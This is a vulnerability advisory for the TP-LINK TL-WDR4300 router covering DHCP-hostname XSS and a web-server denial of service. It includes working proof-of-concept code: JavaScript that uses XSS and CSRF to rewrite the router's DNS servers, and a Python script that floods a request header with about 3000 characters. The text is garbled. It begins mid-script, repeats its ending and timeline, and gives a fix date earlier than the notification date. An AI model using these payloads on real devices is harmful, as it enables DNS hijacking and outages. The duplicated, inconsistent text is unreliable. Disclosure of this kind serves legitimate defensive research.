AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} conn.request("GET","/", "Let me tell you something", headers) print "Done" ---- end wdr4300.py ---- Report Timeline: =========== 2014-07-04: Vendor notified about the vulnerabilities with all the relevant technical information. 2013-09-16: Vendor released a fix. Credits: ====== The Vulnerabilities was discovered by Oz Elisyan. References: ======== http://www.tp-link.com/lk/products/details/?model=TL-WDR4300

Cross-site scripting (XSS) vulnerability in the DHCP clients page in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to inject arbitrary web script or HTML via the hostname in a DHCP request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has an HTML injection vulnerability because it does not adequately filter user-supplied input. Allows an attacker to exploit this vulnerability to execute arbitrary HTML or script code in the browser of an uninformed user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company. Advisory Information =============== Vendors Contacted: TP-LINK Vendor Patched: Yes, Firmware 140916 System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others. # DoS (web server) - Denial of service condition to the device web server, remotely or locally send the device a "GET" request with an extra "Header" with a long value (A x 3000 times). Proof of Concept: ============ http://elisyan.com/tplink/wdr4300.html ---- start wdr4300.html ---- /* Author: Oz Elisyan Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check) */ var xmlhttp; if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.getElementById("myDiv").innerHTML=xmlhttp.responseText; } } xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true); xmlhttp.send(); ---- end wdr4300.html ---- http://elisyan.com/tplink/wdr4300.py ---- start wdr4300.py ---- #Author: Oz Elisyan #TP-Link WDR4300 DoS PoC import httplib conn = httplib.HTTPConnection("192.168.0.1") headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} conn.request("GET","/", "Let me tell you something", headers) print "Done" ---- end wdr4300.py ---- Report Timeline: =========== 2014-07-04: Vendor notified about the vulnerabilities with all the relevant technical information. 2013-09-16: Vendor released a fix. Credits: ====== The Vulnerabilities was discovered by Oz Elisyan. References: ======== http://www.tp-link.com/lk/products/details/?model=TL-WDR4300